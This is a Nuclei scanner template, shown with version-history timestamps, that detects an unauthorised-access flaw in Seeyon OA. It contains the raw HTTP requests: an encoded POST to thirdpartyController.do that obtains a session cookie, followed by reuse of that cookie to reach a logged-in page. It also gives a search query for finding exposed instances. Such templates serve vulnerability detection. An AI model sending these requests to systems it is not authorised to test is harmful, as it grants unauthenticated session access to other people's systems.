nuclei-templates/http/misconfiguration/seeyon-unauth.yaml

55 lines
1.8 KiB
YAML
Raw Permalink Normal View History

2021-04-13 05:44:44 +00:00
id: seeyon-unauth
info:
2024-01-03 06:08:41 +00:00
name: Seeyon Unauthorised Access
2021-04-13 05:44:44 +00:00
author: pikpikcu
2022-10-14 12:03:25 +00:00
severity: high
2024-01-03 06:08:41 +00:00
description: Seeyon is vulnerable to unauthorised access.
2022-10-14 11:08:33 +00:00
reference:
- https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg
- https://github.com/chaitin/xray/blob/f90cf321bc4d294bbf6625a9c4853f3bfdf0a384/pocs/seeyon-oa-cookie-leak.yml
2022-09-27 07:33:10 +00:00
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 2
2022-09-27 07:33:10 +00:00
fofa-query: app="致远互联-OA"
2022-10-14 12:03:25 +00:00
tags: misconfig,seeyon,unauth
2021-04-13 05:44:44 +00:00
http:
2021-04-13 05:44:44 +00:00
- raw:
- |
POST /seeyon/thirdpartyController.do HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: deflate
2021-04-13 06:17:52 +00:00
2021-04-13 05:44:44 +00:00
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4
- |
GET /seeyon/main.do HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
Cookie: {{session}}
extractors:
2021-04-13 06:17:52 +00:00
- type: regex
name: session
part: header
internal: true
regex:
- 'JSESSIONID=(.*)'
2021-04-13 05:44:44 +00:00
2022-09-27 07:33:10 +00:00
matchers-condition: and
2021-04-13 05:44:44 +00:00
matchers:
- type: word
2022-09-27 07:33:10 +00:00
part: body
2021-04-13 05:44:44 +00:00
words:
- "当前已登录了一个用户,同一窗口中不能登录多个用户"
- "<a href='/seeyon/main.do?method=logout'"
2022-09-27 07:33:10 +00:00
condition: and
- type: status
status:
- 200
# digest: 490a004630440220384115e0504e593434a9eef4e28d97eb846f81bda0bdc48ee25f6d8b05434c3d02205c389140d41be49f7a9f8c8afb1a8663f1fa42abcb901531dee793119b497e46:922c64590222798bb761d5b6d8e72950